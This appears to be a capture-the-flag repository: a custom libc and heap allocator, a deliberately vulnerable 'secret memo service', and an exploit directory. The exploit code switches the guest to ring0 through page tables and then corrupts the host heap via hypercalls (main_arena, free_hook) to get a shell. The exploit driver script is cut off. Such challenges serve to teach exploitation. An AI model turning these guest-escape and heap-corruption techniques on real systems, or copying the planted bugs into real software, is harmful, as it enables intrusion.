void _alloc_split(mstate av, mchunkptr p, size_t nb){ 523 | size_t size, remainder_size; 524 | 525 | size = CHUNK_SIZE(p); 526 | assert(size >= nb); 527 | 528 | remainder_size = size - nb; 529 | if(remainder_size < MINSIZE) 530 | SET_INUSE_AT_OFFSET(p, size); 531 | else{ 532 | mchunkptr remainder, fwd, bck; 533 | int inuse; 534 | 535 | inuse = INUSE_AT_OFFSET(p, size); 536 | 537 | remainder = CHUNK_AT_OFFSET(p, nb); 538 | SET_HEAD(p, nb | PREV_INUSE_BIT); 539 | SET_HEAD(remainder, remainder_size | PREV_INUSE_BIT); 540 | SET_FOOT(remainder, remainder_size); 541 | 542 | if(inuse) 543 | _int_free(av, remainder); 544 | else{ 545 | if(!IN_SMALLBIN_RANGE(remainder_size)) 546 | remainder->fd_nextsize = remainder->bk_nextsize = NULL; 547 | 548 | bck = UNSORTED_CHUNKS(av); 549 | fwd = bck->fd; 550 | #ifdef DEBUG 551 | printf("[%s]link : %p\n", __func__, p); 552 | #endif 553 | LINK(remainder, fwd, bck); 554 | } 555 | } 556 | } 557 | 558 | static void *_alloc_top(mstate av, size_t nb){ 559 | mchunkptr victim; 560 | size_t size; 561 | size_t remainder_size; 562 | mchunkptr remainder; 563 | 564 | victim = av->top; 565 | size = CHUNK_SIZE(victim); 566 | 567 | if(size < nb + MINSIZE) 568 | return NULL; 569 | 570 | remainder_size = size - nb; 571 | remainder = CHUNK_AT_OFFSET(victim, nb); 572 | 573 | av->top = remainder; 574 | SET_HEAD(victim, nb | PREV_INUSE_BIT | (av != &main_arena ? NON_MAIN_ARENA_BIT : 0)); 575 | SET_HEAD(remainder, remainder_size | PREV_INUSE_BIT); 576 | 577 | return victim; 578 | } 579 | 580 | static void link_bins(mstate av, mchunkptr p){ 581 | mchunkptr fwd, bck; 582 | size_t size; 583 | unsigned idx; 584 | 585 | size = CHUNK_SIZE(p); 586 | if(IN_SMALLBIN_RANGE(size)){ 587 | idx = SMALLBIN_INDEX(size); 588 | bck = BIN_AT(av, idx); 589 | fwd = bck->fd; 590 | } 591 | else{ 592 | idx = LARGEBIN_INDEX(size); 593 | bck = BIN_AT(av, idx); 594 | fwd = bck->fd; 595 | 596 | if(fwd == bck){ 597 | p->fd_nextsize = p->bk_nextsize = p; 598 | goto link; 599 | } 600 | 601 | if(size < CHUNK_SIZE(bck->bk)){ 602 | fwd = bck; 603 | bck = fwd->bk; 604 | 605 | p->fd_nextsize = fwd->fd; 606 | p->bk_nextsize = fwd->fd->bk_nextsize; 607 | p->fd_nextsize->bk_nextsize = p->bk_nextsize->fd_nextsize = p; 608 | 609 | goto link; 610 | } 611 | 612 | while(size < CHUNK_SIZE(fwd)) 613 | fwd = fwd->fd_nextsize; 614 | 615 | if(size == CHUNK_SIZE(fwd)){ 616 | fwd = fwd->fd; 617 | p->fd_nextsize = p->bk_nextsize = NULL; 618 | } 619 | else{ 620 | p->fd_nextsize = fwd; 621 | p->bk_nextsize = fwd->bk_nextsize; 622 | p->fd_nextsize->bk_nextsize = p->bk_nextsize->fd_nextsize = p; 623 | } 624 | bck = fwd->bk; 625 | } 626 | 627 | link: 628 | #ifdef DEBUG 629 | printf("[%s]link : %p\n", __func__, p); 630 | #endif 631 | LINK(p, fwd, bck); 632 | } 633 | 634 | static void unlink_freelist(mchunkptr p){ 635 | mchunkptr fwd, bck; 636 | 637 | assert(CHUNK_SIZE(p) == PREV_SIZE(NEXT_CHUNK(p))); 638 | 639 | fwd = p->fd; 640 | bck = p->bk; 641 | 642 | #ifdef DEBUG 643 | printf("[%s]unlink : %p\n", __func__, p); 644 | #endif 645 | assert(fwd->bk == p && bck->fd == p); 646 | 647 | bck->fd = fwd; 648 | fwd->bk = bck; 649 | 650 | if(!IN_SMALLBIN_RANGE(CHUNK_SIZE_NOMASK(p)) && p->fd_nextsize){ 651 | mchunkptr fwd_ns, bck_ns; 652 | 653 | fwd_ns = p->fd_nextsize; 654 | bck_ns = p->bk_nextsize; 655 | 656 | assert(fwd_ns->bk_nextsize == p && bck_ns->fd_nextsize == p); 657 | 658 | if(fwd->fd_nextsize){ 659 | fwd_ns->bk_nextsize = bck_ns; 660 | bck_ns->fd_nextsize = fwd_ns; 661 | } 662 | else if (p->fd_nextsize == p) 663 | fwd->fd_nextsize = fwd->bk_nextsize = fwd; 664 | else{ 665 | fwd->fd_nextsize = fwd_ns; 666 | fwd->bk_nextsize = bck_ns; 667 | fwd_ns->bk_nextsize = bck_ns->fd_nextsize = fwd; 668 | } 669 | } 670 | } 671 | 672 | static void munmap_chunk(mchunkptr p){ 673 | void *block; 674 | size_t total_size; 675 | 676 | block = (void*)p - PREV_SIZE(p); 677 | total_size = CHUNK_SIZE(p) + PREV_SIZE(p); 678 | 679 | munmap(block, total_size); 680 | } 681 | -------------------------------------------------------------------------------- /bin/libc/malloc/malloc.h: -------------------------------------------------------------------------------- 1 | #ifndef __MALLOC_H 2 | #define __MALLOC_H 3 | 4 | #include 5 | #include 6 | 7 | #define SIZE_SZ (sizeof(size_t)) 8 | 9 | #define NBINS 128 10 | #define NFASTBINS (FASTBIN_INDEX(REQUEST2SIZE(MAX_FAST_SIZE)) + 1) 11 | #define NSMALLBINS 64 12 | 13 | #define MAX_FAST_SIZE (SIZE_SZ * 80 / 4) 14 | #define SMALLBIN_WIDTH MALLOC_ALIGNMENT 15 | #define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ) 16 | #define MIN_LARGE_SIZE ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH) 17 | 18 | #define FASTBIN_INDEX(sz) ((((unsigned int)(sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2) 19 | #define SMALLBIN_INDEX(sz) ((SMALLBIN_WIDTH == 16 ? (((unsigned)(sz)) >> 4) : (((unsigned) (sz)) >> 3)) + SMALLBIN_CORRECTION) 20 | #define LARGEBIN_INDEX(sz) \ 21 | (((((uint64_t) (sz)) >> 6) <= 48) ? 48 + (((uint64_t) (sz)) >> 6) :\ 22 | ((((uint64_t) (sz)) >> 9) <= 20) ? 91 + (((uint64_t) (sz)) >> 9) :\ 23 | ((((uint64_t) (sz)) >> 12) <= 10) ? 110 + (((uint64_t) (sz)) >> 12) :\ 24 | ((((uint64_t) (sz)) >> 15) <= 4) ? 119 + (((uint64_t) (sz)) >> 15) :\ 25 | ((((uint64_t) (sz)) >> 18) <= 2) ? 124 + (((uint64_t) (sz)) >> 18) : 126) 26 | 27 | #define MALLOC_ALIGNMENT (SIZE_SZ*2 < __alignof__(long double) ? __alignof__(long double) : SIZE_SZ*2) 28 | #define MALLOC_ALIGN_MASK (MALLOC_ALIGNMENT - 1) 29 | #define MIN_CHUNK_SIZE (offsetof(struct malloc_chunk, fd_nextsize)) 30 | #define MINSIZE ((uint64_t)((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)) 31 | #define REQUEST2SIZE(req) \ 32 | (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE) ? MINSIZE : ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK) 33 | 34 | struct malloc_chunk { 35 | size_t prev_size; 36 | size_t size; 37 | 38 | struct malloc_chunk *fd, *bk; 39 | struct malloc_chunk *fd_nextsize, *bk_nextsize; 40 | }; 41 | typedef struct malloc_chunk *mchunkptr, *mfastbinptr, *mbinptr; 42 | 43 | struct malloc_state { 44 | char mutex; 45 | int flags; 46 | 47 | mfastbinptr fastbinsY[NFASTBINS]; 48 | 49 | mchunkptr top; 50 | mchunkptr last_reminder; 51 | mbinptr bins[NBINS*2]; 52 | 53 | struct malloc_state *next; 54 | size_t system_mem; 55 | }; 56 | typedef struct malloc_state *mstate; 57 | 58 | struct malloc_par { 59 | size_t mmap_threshold; 60 | }; 61 | 62 | #endif 63 | -------------------------------------------------------------------------------- /bin/libc/misc/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := misc.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/misc/brk.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../syscall.h" 4 | 5 | static void *__curbrk; 6 | 7 | int brk(void *addr){ 8 | void *res; 9 | 10 | syscall(res, NR_brk); 11 | 12 | if(res < 0) 13 | return -1; 14 | 15 | __curbrk = (void*)res; 16 | return 0; 17 | } 18 | 19 | void *sbrk(intptr_t increment){ 20 | void *oldbrk; 21 | 22 | if (__curbrk == NULL && brk(0) < 0) 23 | return (void *) -1; 24 | 25 | if (increment == 0) 26 | return __curbrk; 27 | 28 | oldbrk = __curbrk; 29 | if (increment > 0 30 | ? ((uintptr_t) oldbrk + (uintptr_t) increment < (uintptr_t) oldbrk) 31 | : ((uintptr_t) oldbrk < (uintptr_t) -increment)) 32 | return (void *) -1; 33 | 34 | if (brk(oldbrk + increment) < 0) 35 | return (void *) -1; 36 | 37 | return oldbrk; 38 | } 39 | -------------------------------------------------------------------------------- /bin/libc/misc/mmap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../syscall.h" 4 | 5 | void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){ 6 | void *mem; 7 | 8 | syscall6(mem, NR_mmap, addr, length, prot, flags, fd, offset); 9 | 10 | return mem; 11 | } 12 | 13 | int mprotect(void *addr, size_t len, int prot){ 14 | long res; 15 | 16 | syscall(res, NR_mprotect); 17 | 18 | return res; 19 | } 20 | 21 | int munmap(void *addr, size_t length){ 22 | long res; 23 | 24 | syscall(res, NR_munmap); 25 | 26 | return res; 27 | } 28 | -------------------------------------------------------------------------------- /bin/libc/stdio/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := stdio.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/stdio/itoa.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | char *itoa(int64_t value, char *str, int radix){ 5 | int i, n; 6 | int64_t _v; 7 | char *p = str; 8 | 9 | if(radix != 10 && radix != 16) 10 | return NULL; 11 | 12 | if(value<0){ 13 | value *= -1; 14 | *(p++) = '-'; 15 | } 16 | 17 | for(n=0, _v=value; _v/=radix; n++); 18 | for(i=n; i>=0; i--, value/=radix) 19 | p[i] = value%radix + (value%radix < 10 ? '0':('a'-10)); 20 | p[n+1] = '\0'; 21 | 22 | return str; 23 | } 24 | 25 | -------------------------------------------------------------------------------- /bin/libc/stdio/printf.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | char *itoa(int64_t value, char *str, int radix); 8 | 9 | char *printf_buf; 10 | 11 | int printf(const char *fmt, ...){ 12 | int n, mod = 0; 13 | va_list ap, ap2; 14 | const char *p; 15 | 16 | if(!printf_buf) 17 | printf_buf = (char*)malloc(0x1000); 18 | 19 | n = strlen(fmt); 20 | 21 | va_start(ap, fmt); 22 | va_copy(ap2, ap); 23 | for(p = fmt; (p = strchr(p, '%')); p += 2){ 24 | register uint64_t arg; 25 | int64_t v; 26 | 27 | arg = va_arg(ap, uint64_t); 28 | switch(*(p+1)){ 29 | case 'p': 30 | n += 2; 31 | case 'd': 32 | case 'x': 33 | v = arg; 34 | if(v < 0){ 35 | n++; 36 | v = -v; 37 | } 38 | for(n++; v /= (*(p+1)=='d'? 10:16); n++); 39 | goto next; 40 | case 's': 41 | n += strlen((char*)arg); 42 | goto next; 43 | } 44 | continue; 45 | next: 46 | n -= 2; 47 | mod++; 48 | } 49 | va_end(ap); 50 | 51 | if(mod > 0){ 52 | char *buf = n+1 < 0x1000 ? printf_buf : malloc(n+1); 53 | 54 | if(!buf){ 55 | n = -1; 56 | goto end; 57 | } 58 | 59 | buf[0] = '\x0'; 60 | while((p = strchr(fmt, '%'))){ 61 | register uint64_t arg; 62 | 63 | strncat(buf, fmt, p-fmt); 64 | 65 | arg = va_arg(ap2, uint64_t); 66 | switch(*(p+1)){ 67 | case 'p': 68 | strncat(buf, "0x", 2); 69 | case 'd': 70 | case 'x': 71 | itoa(arg, buf + strlen(buf), (*(p+1)=='d'? 10:16)); 72 | break; 73 | case 's': 74 | strncat(buf, (char*)arg, n+1 - strlen(buf)); 75 | break; 76 | default: 77 | strncat(buf, p, 2); 78 | } 79 | fmt = p+2; 80 | } 81 | 82 | strncat(buf, fmt, n+1 - strlen(buf)); 83 | write(1, buf, strlen(buf)); 84 | 85 | if(buf != printf_buf) 86 | free(buf); 87 | } 88 | else 89 | write(1, fmt, n); 90 | 91 | end: 92 | va_end(ap2); 93 | return n; 94 | } 95 | 96 | int sprintf(char *buf, char *fmt, ...){ 97 | va_list ap; 98 | char *p; 99 | 100 | va_start(ap, fmt); 101 | 102 | buf[0] = '\0'; 103 | while((p = strchr(fmt, '%'))){ 104 | register uint64_t arg; 105 | 106 | strncat(buf, fmt, p-fmt); 107 | 108 | arg = va_arg(ap, uint64_t); 109 | switch(*(p+1)){ 110 | case 'p': 111 | strncat(buf, "0x", 2); 112 | case 'd': 113 | case 'x': 114 | itoa(arg, buf + strlen(buf), (*(p+1)=='d'? 10:16)); 115 | break; 116 | case 's': 117 | strcat(buf, (char*)arg); 118 | break; 119 | } 120 | fmt = p+2; 121 | } 122 | strcat(buf, fmt); 123 | 124 | va_end(ap); 125 | 126 | return strlen(buf); 127 | } 128 | -------------------------------------------------------------------------------- /bin/libc/stdlib/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := stdlib.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/stdlib/abort.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | __attribute__ ((noreturn)) 4 | void abort(void){ 5 | exit(-1); 6 | } 7 | -------------------------------------------------------------------------------- /bin/libc/stdlib/atoi.c: -------------------------------------------------------------------------------- 1 | int atoi(const char *nptr){ 2 | int i, v = 0, sig = 1; 3 | 4 | for(i=0; !(nptr[i]^' '); i++); 5 | if(nptr[i]=='-'){ 6 | sig = -1; 7 | i++; 8 | } 9 | 10 | for(; nptr[i]>='0' && nptr[i]<='9'; i++){ 11 | v *= 10; 12 | v += nptr[i]-'0'; 13 | } 14 | 15 | return v*sig; 16 | } 17 | -------------------------------------------------------------------------------- /bin/libc/stdlib/exit.s: -------------------------------------------------------------------------------- 1 | .intel_syntax 2 | 3 | .global exit 4 | 5 | exit: 6 | mov %rax, 60 7 | syscall 8 | -------------------------------------------------------------------------------- /bin/libc/string/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := string.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /bin/libc/string/mem.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void *memset(void *s, int c, size_t n){ 4 | for(int i=0; i 2 | #include 3 | 4 | size_t strlen(const char *s){ 5 | size_t i; 6 | for(i=0; s[i]; i++); 7 | return i; 8 | } 9 | 10 | char *strcat(char *dest, const char *src){ 11 | char *p; 12 | 13 | for(p=dest; *p; p++); 14 | for(; *src; p++, src++) 15 | *p = *src; 16 | *p = '\0'; 17 | 18 | return dest; 19 | } 20 | 21 | char *strncat(char *dest, const char *src, size_t n){ 22 | char *p; 23 | unsigned i; 24 | 25 | for(p=dest; *p; p++); 26 | for(i=0; i 5 | 6 | #define str(s) #s 7 | 8 | #define syscall_woret(nr) asm volatile("mov rax, " str(nr) "\r\nsyscall") 9 | #define syscall(x, nr) asm volatile("mov rax, " str(nr) "\r\nsyscall":"=A"(x)) 10 | #define syscall1(x, nr, arg1) \ 11 | do { asm volatile("mov rdi, %0"::"A"((int64_t)arg1)); syscall(x, nr); } while(0) 12 | #define syscall2(x, nr, arg1, arg2) \ 13 | do { asm volatile("mov rsi, %0"::"A"((int64_t)arg2)); syscall1(x, nr, arg1); } while(0) 14 | #define syscall3(x, nr, arg1, arg2, arg3) \ 15 | do { asm volatile("mov rdx, %0"::"A"((int64_t)arg3)); syscall2(x, nr, arg1, arg2); } while(0) 16 | #define syscall4(x, nr, arg1, arg2, arg3, arg4) \ 17 | do { asm volatile("mov r10, %0"::"A"((int64_t)arg4)); syscall3(x, nr, arg1, arg2, arg3); } while(0) 18 | #define syscall5(x, nr, arg1, arg2, arg3, arg4, arg5) \ 19 | do { asm volatile("mov r8, %0"::"A"((int64_t)arg5)); syscall4(x, nr, arg1, arg2, arg3, arg4); } while(0) 20 | #define syscall6(x, nr, arg1, arg2, arg3, arg4, arg5, arg6) \ 21 | do { asm volatile("mov r9, %0"::"A"((int64_t)arg6)); syscall5(x, nr, arg1, arg2, arg3, arg4, arg5); } while(0) 22 | 23 | 24 | #define NR_read 0 25 | #define NR_write 1 26 | 27 | #define NR_mmap 9 28 | #define NR_mprotect 10 29 | #define NR_munmap 11 30 | #define NR_brk 12 31 | 32 | #define NR_exit 60 33 | 34 | #endif 35 | -------------------------------------------------------------------------------- /bin/libc/template.mk: -------------------------------------------------------------------------------- 1 | CSRCS := $(wildcard *.c) 2 | SSRCS := $(wildcard *.s) 3 | 4 | OBJS := $(CSRCS:.c=.o) $(SSRCS:.s=.o) 5 | DEPS := $(CSRCS:.c=.d) 6 | 7 | ifndef CFLAGS 8 | CFLAGS := -Wall -masm=intel -fno-stack-protector -fPIE 9 | endif 10 | 11 | .PHONY: all 12 | all: $(TARGET) 13 | 14 | -include $(DEPS) 15 | 16 | $(TARGET): $(OBJS) 17 | $(AR) rcs $@ $^ 18 | 19 | %.o: %.c 20 | $(CC) $(CFLAGS) -c -MMD -MP $< 21 | 22 | %.o: %.s 23 | $(CC) -c $^ 24 | 25 | .PHONY: clean 26 | clean: 27 | $(RM) $(DEPS) $(OBJS) $(TARGET) 28 | -------------------------------------------------------------------------------- /bin/libc/test/Makefile: -------------------------------------------------------------------------------- 1 | SRCS := $(wildcard *.c) 2 | SHARED_TARGET := $(SRCS:.c=-shared.elf) 3 | STATIC_TARGET := $(SRCS:.c=-static.elf) 4 | 5 | CFLAGS := -Wall -fno-stack-protector -fno-PIE 6 | LDFLAGS := -nostdlib -no-pie 7 | 8 | AS := nasm 9 | 10 | .PHONY: all 11 | all: $(SHARED_TARGET) $(STATIC_TARGET) 12 | 13 | %-shared.elf: %.c start.o ../libc.so 14 | $(CC) $(CFLAGS) $(LDFLAGS) start.o $< -L.. -lc -o $@ 15 | execstack -c $@ 16 | 17 | %-static.elf: start.o %.c ../libc.a 18 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ 19 | execstack -c $@ 20 | 21 | %.o: %.s 22 | $(AS) -f elf64 $^ -o $@ 23 | 24 | .PHONY: clean 25 | clean: 26 | $(RM) $(SHARED_TARGET) $(STATIC_TARGET) 27 | -------------------------------------------------------------------------------- /bin/libc/test/malloc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char *global = "Hello!"; 6 | 7 | int main(void){ 8 | char *buf1, *buf2; 9 | 10 | puts(global); 11 | 12 | puts("malloc 0x100"); 13 | buf1 = malloc(0x100); 14 | puts("malloc 0x30000"); 15 | buf2 = malloc(0x30000); 16 | 17 | write(1, "Input strings...", 16); 18 | read(0, buf1, 128); 19 | puts(buf1); 20 | 21 | write(1, "Input strings...", 16); 22 | read(0, buf2, 128); 23 | puts(buf2); 24 | 25 | puts("free 0x100"); 26 | free(buf1); 27 | puts("free 0x30000"); 28 | free(buf2); 29 | 30 | return 0; 31 | } 32 | -------------------------------------------------------------------------------- /bin/libc/test/memory.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int data = 0xdeadbeef; 6 | int bss; 7 | 8 | int main(void){ 9 | int stack; 10 | void *heap, *mmaped[2]; 11 | 12 | heap = malloc(0x10); 13 | mmaped[0] = mmap((void*)0x80000000, 0x1000, 3, 0x22, -1, 0); 14 | mmaped[1] = mmap(NULL, 0x1000, 3, 0x22, -1, 0); 15 | 16 | printf( "text : %p\n" 17 | "data : %p\n" 18 | "bss : %p\n" 19 | "heap : %p\n" 20 | "mmaped 1 : %p\n" 21 | "mmaped 2 : %p\n" 22 | "stack : %p\n" 23 | , main, &data, &bss, heap, mmaped[0], mmaped[1], &stack); 24 | 25 | for(int i=0; i<2; i++) 26 | munmap(mmaped[i], 0x1000); 27 | free(heap); 28 | } 29 | -------------------------------------------------------------------------------- /bin/libc/test/print.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void){ 6 | char *buf1, *buf2; 7 | 8 | 9 | buf1 = malloc(128); 10 | buf2 = malloc(128); 11 | printf("buf1 : %p, buf2 : %p\n", buf1, buf2); 12 | 13 | printf("Input string..."); 14 | read(0, buf1, 128); 15 | 16 | sprintf(buf2, "input : %s\natoi : %d\n", buf1, atoi(buf1)); 17 | puts(buf2); 18 | 19 | free(buf1); 20 | free(buf2); 21 | 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /bin/libc/test/rw.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(void){ 6 | char buf[128]; 7 | 8 | read(0, buf, 128); 9 | puts(buf); 10 | 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /bin/libc/test/start.s: -------------------------------------------------------------------------------- 1 | global _start 2 | extern main, exit 3 | 4 | _start: 5 | call main 6 | mov rdi, rax 7 | call exit 8 | hlt: 9 | hlt 10 | jmp hlt 11 | -------------------------------------------------------------------------------- /bin/memo.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 7 | #define BUF_SIZE 128 8 | #define MEMO_SIZE 0x28 9 | #define MEMOS 0x10 10 | 11 | struct memo { 12 | char *data; 13 | int edited; 14 | } *memo; 15 | 16 | int menu(void); 17 | void alloc(void); 18 | void edit(void); 19 | void delete(void); 20 | int select_id(void); 21 | 22 | int getnline(char *buf, int len); 23 | int getint(void); 24 | 25 | int main(void){ 26 | puts("==== secret memo service ===="); 27 | 28 | memo = mmap(0, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0); 29 | for(;;){ 30 | switch(menu()){ 31 | case 1: 32 | alloc(); 33 | break; 34 | case 2: 35 | edit(); 36 | break; 37 | case 3: 38 | delete(); 39 | break; 40 | case 0: 41 | goto end; 42 | default: 43 | puts("Wrong input."); 44 | } 45 | } 46 | 47 | end: 48 | munmap(memo, 0x1000); 49 | puts("Bye!"); 50 | 51 | return 0; 52 | } 53 | 54 | int menu(void){ 55 | printf( "\nMENU\n" 56 | "1. Alloc\n" 57 | "2. Edit\n" 58 | "3. Delete\n" 59 | "0. Exit\n" 60 | "> "); 61 | 62 | return getint(); 63 | } 64 | 65 | void alloc(void){ 66 | int id, n; 67 | 68 | for(id = 0; id < MEMOS; id++) 69 | if(!memo[id].data) 70 | break; 71 | 72 | if(id >= MEMOS){ 73 | puts("Entry is FULL..."); 74 | return; 75 | } 76 | 77 | memo[id].data = (char*)calloc(MEMO_SIZE, 1); 78 | memo[id].edited = 0; 79 | 80 | printf("Input memo > "); 81 | n = read(0, memo[id].data, MEMO_SIZE); 82 | 83 | printf("Added id:%d entry (%d bytes)\n", id, n); 84 | } 85 | 86 | void edit(void){ 87 | int id, n; 88 | 89 | if((id = select_id()) < 0) 90 | return; 91 | 92 | if(memo[id].edited){ 93 | puts("You already edited this entry..."); 94 | return; 95 | } 96 | 97 | printf("Input memo > "); 98 | n = read(0, memo[id].data, strlen(memo[id].data)); 99 | memo[id].edited = 1; 100 | 101 | printf("Edited id:%d entry (%d bytes)\n", id, n); 102 | } 103 | 104 | void delete(void){ 105 | int id; 106 | if((id = select_id()) < 0) 107 | return; 108 | 109 | free(memo[id].data); 110 | memo[id].data = NULL; 111 | 112 | printf("Deleted id:%d entry\n", id); 113 | } 114 | 115 | int select_id(void){ 116 | int id; 117 | 118 | printf("Input id > "); 119 | id = getint(); 120 | 121 | if(id < 0 || id > MEMOS){ 122 | puts("Invalid id..."); 123 | return -1; 124 | } 125 | 126 | if(!memo[id].data){ 127 | puts("Entry does not exist..."); 128 | return -1; 129 | } 130 | 131 | return id; 132 | } 133 | 134 | int getnline(char *buf, int size){ 135 | int len; 136 | char *lf; 137 | 138 | if(size < 0) 139 | return 0; 140 | 141 | len = read(0, buf, size-1); 142 | buf[len] = '\0'; 143 | 144 | if((lf=strchr(buf,'\n'))) 145 | *lf='\0'; 146 | 147 | return len; 148 | } 149 | 150 | int getint(void){ 151 | char buf[BUF_SIZE]; 152 | 153 | getnline(buf, sizeof(buf)); 154 | return atoi(buf); 155 | } 156 | -------------------------------------------------------------------------------- /bin/start.s: -------------------------------------------------------------------------------- 1 | global _start 2 | extern main, exit 3 | 4 | _start: 5 | call main 6 | mov rdi, rax 7 | call exit 8 | hlt: 9 | hlt 10 | jmp hlt 11 | -------------------------------------------------------------------------------- /exploit/Makefile: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | SRCS := $(wildcard *.c) 4 | TARGET := $(SRCS:.c=.elf) 5 | 6 | SUB_OBJS := utils/utils.a 7 | 8 | CFLAGS := -Wall -masm=intel -fno-stack-protector -fPIE 9 | LDFLAGS := -nostdlib -no-pie 10 | 11 | ifndef SYS_HANDLER 12 | SYS_HANDLER := 0x17cb 13 | endif 14 | 15 | export CFLAGS 16 | 17 | .PHONY: all 18 | all: $(TARGET) 19 | 20 | %.elf: start.o %.c $(SUB_OBJS) 21 | $(CC) $(CFLAGS) $(LDFLAGS) $^ -o $@ -DOFST_SYS_HANDLER=$(SYS_HANDLER) 22 | strip $@ 23 | 24 | %.o: %.s 25 | $(AS) -f elf64 $^ 26 | 27 | $(SUB_OBJS): FORCE 28 | $(MAKE) -C $(dir $@) $(notdir $@) 29 | 30 | .PHONY: clean 31 | clean: 32 | dirname $(SUB_OBJS) | xargs -l $(MAKE) clean -C 33 | $(RM) $(TARGET) 34 | 35 | FORCE: 36 | -------------------------------------------------------------------------------- /exploit/exploit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "utils/hypercall.h" 7 | #include "utils/syscall.h" 8 | 9 | #define PDE64_PRESENT 1 10 | #define PDE64_RW (1U << 1) 11 | #define PDE64_USER (1U << 2) 12 | #define PDE64_PS (1U << 7) 13 | 14 | void get_flag1(void); 15 | void get_flag2(void); 16 | void get_shell(void); 17 | void switch_ring0(void); 18 | void syscall_handler(void); 19 | 20 | int main(void){ 21 | get_flag1(); 22 | switch_ring0(); 23 | 24 | return 0; 25 | } 26 | 27 | void get_flag1(void){ 28 | char *flag; 29 | 30 | puts("Try to call sys_getflag"); 31 | 32 | syscall(flag, NR_getflag); 33 | if((long)flag < 0){ 34 | puts("failed to get flag."); 35 | return; 36 | } 37 | 38 | mprotect(flag, 0x1000, PROT_READ); 39 | puts(flag); 40 | munmap(flag, 0x1000); 41 | } 42 | 43 | void switch_ring0(void){ 44 | void *addr; 45 | uint64_t *pd, *pt; 46 | 47 | puts("Try to switch ring0"); 48 | 49 | addr = mmap((void*)0x80000000, 0x3000, PROT_READ|PROT_WRITE, 0, -1, 0); 50 | munmap(addr, 0x1000); 51 | mmap((void*)0xc0000000, 0x1000, PROT_READ|PROT_WRITE, 0, -1, 0); 52 | 53 | pd = addr + 0x1000; 54 | pt = addr + 0x2000; 55 | 56 | for(int i = 0; i<2; i++) // pd[0] 57 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (0x1000*i); 58 | for(int i = 0; i<3; i++) 59 | pd[8+i] = PDE64_PRESENT | PDE64_RW | PDE64_PS | (0x400000 + 0x200000*i); 60 | 61 | memcpy((void*)(0xc0000000 + OFST_SYS_HANDLER), &syscall_handler, 0x800); 62 | 63 | asm("syscall"); 64 | } 65 | 66 | void syscall_handler(void){ 67 | get_flag2(); 68 | get_shell(); 69 | 70 | asm("hlt"); 71 | } 72 | 73 | void get_flag2(void){ 74 | char *flag; 75 | 76 | flag = hc_load_module(2, 0, 0, 0x1000); 77 | hc_write(flag + 0x8040000000, 0x50, 0); 78 | hc_free(flag); 79 | } 80 | 81 | void get_shell(void){ 82 | void *libc = (void*)0xc1000000; 83 | char *heap = (void*)0xc2000000; 84 | uint64_t *pd = (uint64_t*)(0x8040000000 + 0x2e000); // 85 | 86 | void *main_arena; 87 | uint64_t *free_hook; 88 | hc_read(&main_arena, 0x8, 0); 89 | hc_read(&free_hook, 0x8, 0); 90 | main_arena = libc + (uint64_t)main_arena; 91 | free_hook = libc + (uint64_t)free_hook; 92 | 93 | uint64_t offset_top; 94 | hc_read(&offset_top, 0x8, 0); 95 | hc_write(main_arena + offset_top, 0x18, 0); 96 | 97 | hc_read(free_hook, 0x8, 0); 98 | hc_read(&pd[16], 0x8, 0); 99 | 100 | uint64_t page_offset; 101 | hc_read(&page_offset, 0x8, 0); 102 | 103 | void *p[2]; 104 | p[0] = hc_malloc(0, 0x1000); 105 | p[1] = hc_malloc(0, 0x1000); 106 | 107 | hc_free(p[0]); 108 | hc_read(heap+page_offset, 0x8, 0); 109 | hc_free(p[1]); 110 | } 111 | -------------------------------------------------------------------------------- /exploit/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py 3 | from os import chdir, path 4 | 5 | bin_file = './kvm.elf' 6 | args = 'kernel.bin memo-static.elf flag2.txt'.split()+['a']*0x100 7 | context(os = 'linux', arch = 'amd64') 8 | # context.log_level = 'debug' 9 | 10 | #========== 11 | 12 | env = Environment('debug', 'local', 'remote') 13 | env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET') 14 | env.set_item('target', debug = {'argv':[bin_file]+args, 'aslr':False}, \ 15 | local = {'argv':['./pow.py', 